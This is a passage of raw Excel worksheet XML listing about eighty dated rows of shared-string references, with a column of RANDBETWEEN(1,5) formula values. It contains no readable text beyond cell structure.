        <v>178</v>
      </c>
      <c r="E13465" s="2" t="s">
        <v>12071</v>
      </c>
      <c r="F13465">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13466" s="1">
        <v>43270.540601851855</v>
      </c>
      <c r="C13466" t="s">
        <v>41</v>
      </c>
      <c r="D13466" t="s">
        <v>41</v>
      </c>
      <c r="E13466" t="s">
        <v>12072</v>
      </c>
      <c r="F13466">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13467" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13467" s="1">
        <v>43270.517233796294</v>
      </c>
      <c r="C13467" t="s">
        <v>71</v>
      </c>
      <c r="E13467" s="2" t="s">
        <v>12073</v>
      </c>
      <c r="F13467">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13468" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13468" s="1">
        <v>43270.512638888889</v>
      </c>
      <c r="C13468" t="s">
        <v>65</v>
      </c>
      <c r="E13468" s="2" t="s">
        <v>12074</v>
      </c>
      <c r="F13468">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13469" s="1">
        <v>43270.50885416667</v>
      </c>
      <c r="C13469" t="s">
        <v>10</v>
      </c>
      <c r="D13469" t="s">
        <v>36</v>
      </c>
      <c r="E13469" t="s">
        <v>12075</v>
      </c>
      <c r="F13469">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13470" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A13470" s="1">
        <v>43270.501273148147</v>
      </c>
      <c r="C13470" t="s">
        <v>6</v>
      </c>
      <c r="D13470" t="s">
        <v>25</v>
      </c>
      <c r="E13470" s="2" t="s">
        <v>12076</v>
      </c>
      <c r="F13470">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13471" s="1">
        <v>43270.498252314814</v>
      </c>
      <c r="C13471" t="s">
        <v>10</v>
      </c>
      <c r="D13471" t="s">
        <v>6</v>
      </c>
      <c r="E13471" t="s">
        <v>12077</v>
      </c>
      <c r="F13471">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13472" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13472" s="1">
        <v>43270.496261574073</v>
      </c>
      <c r="C13472" t="s">
        <v>344</v>
      </c>
      <c r="E13472" t="s">
        <v>12078</v>
      </c>
      <c r="F13472">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13473" s="1">
        <v>43270.481099537035</v>
      </c>
      <c r="C13473" t="s">
        <v>6</v>
      </c>
      <c r="D13473" t="s">
        <v>67</v>
      </c>
      <c r="E13473" t="s">
        <v>12079</v>
      </c>
      <c r="F13473">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13474" s="1">
        <v>43270.480162037034</v>
      </c>
      <c r="C13474" t="s">
        <v>48</v>
      </c>
      <c r="E13474" t="s">
        <v>12080</v>
      </c>
      <c r="F13474">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13475" s="1">
        <v>43270.473414351851</v>
      </c>
      <c r="C13475" t="s">
        <v>10</v>
      </c>
      <c r="E13475" t="s">
        <v>12081</v>
      </c>
      <c r="F13475">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13476" s="1">
        <v>43270.470729166664</v>
      </c>
      <c r="C13476" t="s">
        <v>10</v>
      </c>
      <c r="D13476" t="s">
        <v>374</v>
      </c>
      <c r="E13476" t="s">
        <v>12082</v>
      </c>
      <c r="F13476">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13477" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13477" s="1">
        <v>43270.463738425926</v>
      </c>
      <c r="C13477" t="s">
        <v>10</v>
      </c>
      <c r="D13477" t="s">
        <v>494</v>
      </c>
      <c r="E13477" t="s">
        <v>12083</v>
      </c>
      <c r="F13477">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13478" s="1">
        <v>43270.460266203707</v>
      </c>
      <c r="C13478" t="s">
        <v>10</v>
      </c>
      <c r="D13478" t="s">
        <v>163</v>
      </c>
      <c r="E13478" t="s">
        <v>12084</v>
      </c>
      <c r="F13478">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13479" s="1">
        <v>43270.441805555558</v>
      </c>
      <c r="C13479" t="s">
        <v>10</v>
      </c>
      <c r="D13479" t="s">
        <v>112</v>
      </c>
      <c r="E13479" t="s">
        <v>12085</v>
      </c>
      <c r="F13479">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13480" s="1">
        <v>43270.425092592595</v>
      </c>
      <c r="C13480" t="s">
        <v>10</v>
      </c>
      <c r="D13480" t="s">
        <v>89</v>
      </c>
      <c r="E13480" t="s">
        <v>12086</v>
      </c>
      <c r="F13480">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13481" s="1">
        <v>43270.379259259258</v>
      </c>
      <c r="C13481" t="s">
        <v>140</v>
      </c>
      <c r="D13481" t="s">
        <v>141</v>
      </c>
      <c r="E13481" t="s">
        <v>12087</v>
      </c>
      <c r="F13481">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13482" s="1">
        <v>43270.310590277775</v>
      </c>
      <c r="C13482" t="s">
        <v>41</v>
      </c>
      <c r="E13482" t="s">
        <v>12088</v>
      </c>
      <c r="F13482">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13483" s="1">
        <v>43270.2887962963</v>
      </c>
      <c r="C13483" t="s">
        <v>477</v>
      </c>
      <c r="D13483" t="s">
        <v>336</v>
      </c>
      <c r="E13483" t="s">
        <v>8504</v>
      </c>
      <c r="F13483">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13484" s="1">
        <v>43270.261863425927</v>
      </c>
      <c r="C13484" t="s">
        <v>2082</v>
      </c>
      <c r="E13484" t="s">
        <v>12089</v>
      </c>
      <c r="F13484">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13485" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13485" s="1">
        <v>43270.251145833332</v>
      </c>
      <c r="C13485" t="s">
        <v>10</v>
      </c>
      <c r="D13485" t="s">
        <v>92</v>
      </c>
      <c r="E13485" s="2" t="s">
        <v>12090</v>
      </c>
      <c r="F13485">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13486" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13486" s="1">
        <v>43270.247037037036</v>
      </c>
      <c r="C13486" t="s">
        <v>41</v>
      </c>
      <c r="E13486" s="2" t="s">
        <v>12091</v>
      </c>
      <c r="F13486">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13487" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13487" s="1">
        <v>43270.240393518521</v>
      </c>
      <c r="C13487" t="s">
        <v>41</v>
      </c>
      <c r="E13487" t="s">
        <v>12092</v>
      </c>
      <c r="F13487">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13488" s="1">
        <v>43270.232581018521</v>
      </c>
      <c r="C13488" t="s">
        <v>134</v>
      </c>
      <c r="E13488" t="s">
        <v>12093</v>
      </c>
      <c r="F13488">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13489" s="1">
        <v>43270.199641203704</v>
      </c>
      <c r="C13489" t="s">
        <v>731</v>
      </c>
      <c r="D13489" t="s">
        <v>124</v>
      </c>
      <c r="E13489" t="s">
        <v>8504</v>
      </c>
      <c r="F13489">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13490" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A13490" s="1">
        <v>43270.156817129631</v>
      </c>
      <c r="C13490" t="s">
        <v>124</v>
      </c>
      <c r="E13490" s="2" t="s">
        <v>12094</v>
      </c>
      <c r="F13490">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13491" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13491" s="1">
        <v>43270.129953703705</v>
      </c>
      <c r="C13491" t="s">
        <v>48</v>
      </c>
      <c r="E13491" s="2" t="s">
        <v>12095</v>
      </c>
      <c r="F13491">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13492" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13492" s="1">
        <v>43270.090879629628</v>
      </c>
      <c r="C13492" t="s">
        <v>314</v>
      </c>
      <c r="E13492" s="2" t="s">
        <v>12096</v>
      </c>
      <c r="F13492">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13493" s="1">
        <v>43269.866898148146</v>
      </c>
      <c r="C13493" t="s">
        <v>253</v>
      </c>
      <c r="D13493" t="s">
        <v>367</v>
      </c>
      <c r="E13493" t="s">
        <v>12097</v>
      </c>
      <c r="F13493">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13494" s="1">
        <v>43269.788437499999</v>
      </c>
      <c r="C13494" t="s">
        <v>10</v>
      </c>
      <c r="D13494" t="s">
        <v>336</v>
      </c>
      <c r="E13494" t="s">
        <v>12098</v>
      </c>
      <c r="F13494">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13495" s="1">
        <v>43269.786469907405</v>
      </c>
      <c r="C13495" t="s">
        <v>189</v>
      </c>
      <c r="D13495" t="s">
        <v>6</v>
      </c>
      <c r="E13495" t="s">
        <v>11929</v>
      </c>
      <c r="F13495">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13496" s="1">
        <v>43269.78329861111</v>
      </c>
      <c r="C13496" t="s">
        <v>10</v>
      </c>
      <c r="D13496" t="s">
        <v>52</v>
      </c>
      <c r="E13496" t="s">
        <v>12099</v>
      </c>
      <c r="F13496">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13497" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13497" s="1">
        <v>43269.74863425926</v>
      </c>
      <c r="C13497" t="s">
        <v>6</v>
      </c>
      <c r="D13497" t="s">
        <v>25</v>
      </c>
      <c r="E13497" s="2" t="s">
        <v>12100</v>
      </c>
      <c r="F13497">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13498" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13498" s="1">
        <v>43269.741307870368</v>
      </c>
      <c r="C13498" t="s">
        <v>3049</v>
      </c>
      <c r="E13498" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F13498">
        <f t="shared" ca="1" si="210"/>
        <v>5</v>
      </c>
    </row>
    <row r="13499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13499" s="1">
        <v>43269.72457175926</v>
      </c>
      <c r="C13499" t="s">
        <v>10</v>
      </c>
      <c r="D13499" t="s">
        <v>251</v>
      </c>
      <c r="E13499" t="s">
        <v>12101</v>
      </c>
      <c r="F13499">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13500" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13500" s="1">
        <v>43269.652303240742</v>
      </c>
      <c r="C13500" t="s">
        <v>41</v>
      </c>
      <c r="E13500" t="s">
        <v>12102</v>
      </c>
      <c r="F13500">
        <f t="shared" ca="1" si="210"/>
        <v>1</v>
      </c>
    </row>
    <row r="13501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13501" s="1">
        <v>43269.636238425926</v>
      </c>
      <c r="C13501" t="s">
        <v>60</v>
      </c>
      <c r="E13501" t="s">
        <v>12103</v>
      </c>
      <c r="F13501">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13502" s="1">
        <v>43269.585821759261</v>
      </c>
      <c r="C13502" t="s">
        <v>41</v>
      </c>
      <c r="E13502" t="s">
        <v>12104</v>
      </c>
      <c r="F13502">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13503" s="1">
        <v>43269.579780092594</v>
      </c>
      <c r="C13503" t="s">
        <v>6</v>
      </c>
      <c r="D13503" t="s">
        <v>114</v>
      </c>
      <c r="E13503" t="s">
        <v>12105</v>
      </c>
      <c r="F13503">
        <f t="shared" ca="1" si="210"/>
        <v>2</v>
      </c>
    </row>
    <row r="13504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13504" s="1">
        <v>43269.572997685187</v>
      </c>
      <c r="C13504" t="s">
        <v>10</v>
      </c>
      <c r="D13504" t="s">
        <v>163</v>
      </c>
      <c r="E13504" t="s">
        <v>12106</v>
      </c>
      <c r="F13504">
        <f t="shared" ca="1" si="210"/>
        <v>3</v>
      </c>
    </row>
    <row r="13505" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13505" s="1">
        <v>43269.568842592591</v>
      </c>
      <c r="C13505" t="s">
        <v>10</v>
      </c>
      <c r="D13505" t="s">
        <v>6</v>
      </c>
      <c r="E13505" s="2" t="s">
        <v>12107</v>
      </c>
      <c r="F13505">
        <f t="shared" ca="1" si="210"/>
        <v>4</v>
      </c>
    </row>
    <row r="13506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13506" s="1">
        <v>43269.560185185182</v>
      </c>
      <c r="C13506" t="s">
        <v>6</v>
      </c>
      <c r="D13506" t="s">
        <v>114</v>
      </c>
      <c r="E13506" t="s">
        <v>12108</v>
      </c>
      <c r="F13506">
        <f t="shared" ref="F13506:F13569" ca="1" si="211">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="13507" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A13507" s="1">
        <v>43269.548136574071</v>
      </c>
      <c r="C13507" t="s">
        <v>10</v>
      </c>
      <c r="D13507" t="s">
        <v>6</v>
      </c>
      <c r="E13507" s="2" t="s">
        <v>12109</v>
      </c>
      <c r="F13507">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13508" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13508" s="1">
        <v>43269.540775462963</v>
      </c>
      <c r="C13508" t="s">
        <v>16</v>
      </c>
      <c r="E13508" s="2" t="s">
        <v>12110</v>
      </c>
      <c r="F13508">
        <f t="shared" ca="1" si="211"/>
        <v>3</v>
      </c>
    </row>
    <row r="13509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13509" s="1">
        <v>43269.538425925923</v>
      </c>
      <c r="C13509" t="s">
        <v>10</v>
      </c>
      <c r="D13509" t="s">
        <v>46</v>
      </c>
      <c r="E13509" t="s">
        <v>12111</v>
      </c>
      <c r="F13509">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13510" s="1">
        <v>43269.530162037037</v>
      </c>
      <c r="C13510" t="s">
        <v>10</v>
      </c>
      <c r="D13510" t="s">
        <v>374</v>
      </c>
      <c r="E13510" t="s">
        <v>12112</v>
      </c>
      <c r="F13510">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13511" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13511" s="1">
        <v>43269.506053240744</v>
      </c>
      <c r="C13511" t="s">
        <v>3443</v>
      </c>
      <c r="D13511" t="s">
        <v>1993</v>
      </c>
      <c r="E13511" s="2" t="s">
        <v>6532</v>
      </c>
      <c r="F13511">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13512" s="1">
        <v>43269.497384259259</v>
      </c>
      <c r="C13512" t="s">
        <v>10</v>
      </c>
      <c r="D13512" t="s">
        <v>41</v>
      </c>
      <c r="E13512" t="s">
        <v>12113</v>
      </c>
      <c r="F13512">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13513" s="1">
        <v>43269.487881944442</v>
      </c>
      <c r="C13513" t="s">
        <v>10</v>
      </c>
      <c r="D13513" t="s">
        <v>36</v>
      </c>
      <c r="E13513" t="s">
        <v>12114</v>
      </c>
      <c r="F13513">
        <f t="shared" ca="1" si="211"/>
        <v>3</v>
      </c>
    </row>
    <row r="13514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13514" s="1">
        <v>43269.485636574071</v>
      </c>
      <c r="C13514" t="s">
        <v>10</v>
      </c>
      <c r="D13514" t="s">
        <v>52</v>
      </c>
      <c r="E13514" t="s">
        <v>12115</v>
      </c>
      <c r="F13514">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13515" s="1">
        <v>43269.475266203706</v>
      </c>
      <c r="C13515" t="s">
        <v>10</v>
      </c>
      <c r="D13515" t="s">
        <v>46</v>
      </c>
      <c r="E13515" t="s">
        <v>12116</v>
      </c>
      <c r="F13515">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13516" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13516" s="1">
        <v>43269.452789351853</v>
      </c>
      <c r="C13516" t="s">
        <v>318</v>
      </c>
      <c r="E13516" t="s">
        <v>12117</v>
      </c>
      <c r="F13516">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13517" s="1">
        <v>43269.451666666668</v>
      </c>
      <c r="C13517" t="s">
        <v>10</v>
      </c>
      <c r="D13517" t="s">
        <v>17</v>
      </c>
      <c r="E13517" t="s">
        <v>12118</v>
      </c>
      <c r="F13517">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13518" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13518" s="1">
        <v>43269.449594907404</v>
      </c>
      <c r="C13518" t="s">
        <v>48</v>
      </c>
      <c r="E13518" t="s">
        <v>12119</v>
      </c>
      <c r="F13518">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13519" s="1">
        <v>43269.431793981479</v>
      </c>
      <c r="C13519" t="s">
        <v>103</v>
      </c>
      <c r="E13519" t="s">
        <v>12120</v>
      </c>
      <c r="F13519">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13520" s="1">
        <v>43269.414155092592</v>
      </c>
      <c r="C13520" t="s">
        <v>10</v>
      </c>
      <c r="D13520" t="s">
        <v>36</v>
      </c>
      <c r="E13520" t="s">
        <v>12121</v>
      </c>
      <c r="F13520">
        <f t="shared" ca="1" si="211"/>
        <v>3</v>
      </c>
    </row>
    <row r="13521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13521" s="1">
        <v>43269.386435185188</v>
      </c>
      <c r="C13521" t="s">
        <v>134</v>
      </c>
      <c r="E13521" t="s">
        <v>12122</v>
      </c>
      <c r="F13521">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13522" s="1">
        <v>43269.384212962963</v>
      </c>
      <c r="C13522" t="s">
        <v>623</v>
      </c>
      <c r="E13522" t="s">
        <v>12123</v>
      </c>
      <c r="F13522">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13523" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A13523" s="1">
        <v>43269.377800925926</v>
      </c>
      <c r="C13523" t="s">
        <v>71</v>
      </c>
      <c r="E13523" s="2" t="s">
        <v>12124</v>
      </c>
      <c r="F13523">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13524" s="1">
        <v>43269.376250000001</v>
      </c>
      <c r="C13524" t="s">
        <v>48</v>
      </c>
      <c r="E13524" t="s">
        <v>12125</v>
      </c>
      <c r="F13524">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13525" s="1">
        <v>43269.354513888888</v>
      </c>
      <c r="C13525" t="s">
        <v>197</v>
      </c>
      <c r="E13525" t="s">
        <v>12126</v>
      </c>
      <c r="F13525">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13526" s="1">
        <v>43269.354259259257</v>
      </c>
      <c r="C13526" t="s">
        <v>41</v>
      </c>
      <c r="E13526" t="s">
        <v>12127</v>
      </c>
      <c r="F13526">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13527" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13527" s="1">
        <v>43269.347141203703</v>
      </c>
      <c r="C13527" t="s">
        <v>41</v>
      </c>
      <c r="E13527" s="2" t="s">
        <v>12128</v>
      </c>
      <c r="F13527">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13528" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13528" s="1">
        <v>43269.269189814811</v>
      </c>
      <c r="C13528" t="s">
        <v>10</v>
      </c>
      <c r="D13528" t="s">
        <v>89</v>
      </c>
      <c r="E13528" s="2" t="s">
        <v>12129</v>
      </c>
      <c r="F13528">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13529" s="1">
        <v>43269.264004629629</v>
      </c>
      <c r="C13529" t="s">
        <v>41</v>
      </c>
      <c r="E13529" t="s">
        <v>12130</v>
      </c>
      <c r="F13529">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13530" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A13530" s="1">
        <v>43269.258379629631</v>
      </c>
      <c r="C13530" t="s">
        <v>17</v>
      </c>
      <c r="E13530" s="2" t="s">
        <v>12131</v>
      </c>
      <c r="F13530">
        <f t="shared" ca="1" si="211"/>
        <v>3</v>
      </c>
    </row>
    <row r="13531" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13531" s="1">
        <v>43269.250694444447</v>
      </c>
      <c r="C13531" t="s">
        <v>253</v>
      </c>
      <c r="F13531">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13532" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13532" s="1">
        <v>43269.238391203704</v>
      </c>
      <c r="C13532" t="s">
        <v>48</v>
      </c>
      <c r="E13532" t="s">
        <v>12132</v>
      </c>
      <c r="F13532">
        <f t="shared" ca="1" si="211"/>
        <v>1</v>
      </c>
    </row>
    <row r="13533" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13533" s="1">
        <v>43269.233206018522</v>
      </c>
      <c r="C13533" t="s">
        <v>41</v>
      </c>
      <c r="E13533" s="2" t="s">
        <v>12133</v>
      </c>
      <c r="F13533">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13534" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13534" s="1">
        <v>43269.205810185187</v>
      </c>
      <c r="C13534" t="s">
        <v>1080</v>
      </c>
      <c r="E13534" s="2" t="s">
        <v>12134</v>
      </c>
      <c r="F13534">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13535" s="1">
        <v>43269.203379629631</v>
      </c>
      <c r="C13535" t="s">
        <v>48</v>
      </c>
      <c r="E13535" t="s">
        <v>12135</v>
      </c>
      <c r="F13535">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13536" s="1">
        <v>43269.178148148145</v>
      </c>
      <c r="C13536" t="s">
        <v>45</v>
      </c>
      <c r="D13536" t="s">
        <v>71</v>
      </c>
      <c r="E13536" t="s">
        <v>8504</v>
      </c>
      <c r="F13536">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13537" s="1">
        <v>43269.165497685186</v>
      </c>
      <c r="C13537" t="s">
        <v>48</v>
      </c>
      <c r="E13537" t="s">
        <v>12136</v>
      </c>
      <c r="F13537">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13538" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A13538" s="1">
        <v>43269.162870370368</v>
      </c>
      <c r="C13538" t="s">
        <v>50</v>
      </c>
      <c r="E13538" s="2" t="s">
        <v>12137</v>
      </c>
      <c r="F13538">
        <f t="shared" ca="1" si="211"/>
        <v>2</v>
      </c>
    </row>
    <row r="13539" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A13539" s="1">
        <v>43269.142951388887</v>
      </c>
      <c r="C13539" t="s">
        <v>41</v>
      </c>
      <c r="E13539" s="2" t="s">
        <v>12138</v>
      </c>
      <c r="F13539">
        <f t="shared" ca="1" si="211"/>
        <v>3</v>
      </c>
    </row>
    <row r="13540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13540" s="1">
        <v>43268.823750000003</v>
      </c>
      <c r="C13540" t="s">
        <v>885</v>
      </c>
      <c r="E13540" t="s">
        <v>12139</v>
      </c>
      <c r="F13540">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13541" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13541" s="1">
        <v>43268.740439814814</v>
      </c>
      <c r="C13541" t="s">
        <v>1050</v>
      </c>
      <c r="D13541" t="s">
        <v>151</v>
      </c>
      <c r="E13541" t="s">
        <v>12140</v>
      </c>
      <c r="F13541">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13542" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13542" s="1">
        <v>43268.294490740744</v>
      </c>
      <c r="C13542" t="s">
        <v>471</v>
      </c>
      <c r="E13542" t="s">
        <v>12141</v>
      </c>
      <c r="F13542">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13543" s="1">
        <v>43267.834131944444</v>
      </c>
      <c r="C13543" t="s">
        <v>10</v>
      </c>
      <c r="D13543" t="s">
        <v>6</v>
      </c>
      <c r="E13543" t="s">
        <v>12142</v>
      </c>
      <c r="F13543">
        <f t="shared" ca="1" si="211"/>
        <v>4</v>
      </c>
    </row>
    <row r="13544" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13544" s="1">
        <v>43267.605787037035</v>
      </c>
      <c r="C13544" t="s">
        <v>471</v>
      </c>
      <c r="E13544" t="s">
        <v>12143</v>
      </c>
      <c r="F13544">
        <f t="shared" ca="1" si="211"/>
        <v>5</v>
      </c>
    </row>
    <row r="13545" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13545" s="1">
        <v>43267.548576388886</v>
      </c>
      <c r="C13545" t="s">
        <v>41</v>
      </c>
      <c r="E13545" t="s">
        <v>12144</v>
      </c>
